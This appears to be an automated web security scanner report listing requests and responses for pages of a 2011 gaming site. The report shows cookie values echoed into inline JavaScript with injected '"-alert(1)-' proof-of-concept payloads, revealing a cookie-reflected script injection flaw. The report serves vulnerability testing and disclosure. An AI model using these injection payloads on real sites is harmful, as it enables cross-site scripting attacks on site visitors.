HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/ Set-Cookie: BO=FMec6c7"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36127 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMec6c7"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /ContactUsTel.aspx |
GET /ContactUsTel.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMc1238" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36126 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMc1238"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /FAQ.aspx |
GET /FAQ.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/ Set-Cookie: BO=FMd21b0"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 86752 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMd21b0"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /FAQ.aspx |
GET /FAQ.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM40ba4" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:15 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:15 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:15 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 86752 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM40ba4"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/ Set-Cookie: BO=FM114da"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 38037 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM114da"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM2bb77" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 38037 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM2bb77"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:02 GMT; path=/ Set-Cookie: BO=FM85403"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:02 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:02 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36959 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM85403"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMd14ae" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:05 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:05 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:05 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36960 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMd14ae"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:53 GMT; path=/ Set-Cookie: BO=FMb6f07"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:53 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:53 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48710 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMb6f07"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM1384a" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:41 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:41 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:41 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48710 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM1384a"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/ Set-Cookie: BO=FMe1a56"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43406 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMe1a56"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM261b0" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43406 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM261b0"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:27 GMT; path=/ Set-Cookie: BO=FM7c1e4"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:27 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:27 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 39130 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM7c1e4"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMed3a6" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:16 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:16 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:16 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 39130 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMed3a6"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/ Set-Cookie: BO=FM594bd"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 42806 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM594bd"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM3e850" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:09 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:09 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:09 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 42806 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM3e850"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /SecurityAndPrivacy.aspx |
GET /SecurityAndPrivacy.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/ Set-Cookie: BO=FMeed7e"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36037 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMeed7e"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /SecurityAndPrivacy.aspx |
GET /SecurityAndPrivacy.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM2e19c" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:54 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:54 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:54 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36037 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM2e19c"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:43 GMT; path=/ Set-Cookie: BO=FM3771c"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:43 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:43 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 104795 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM3771c"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
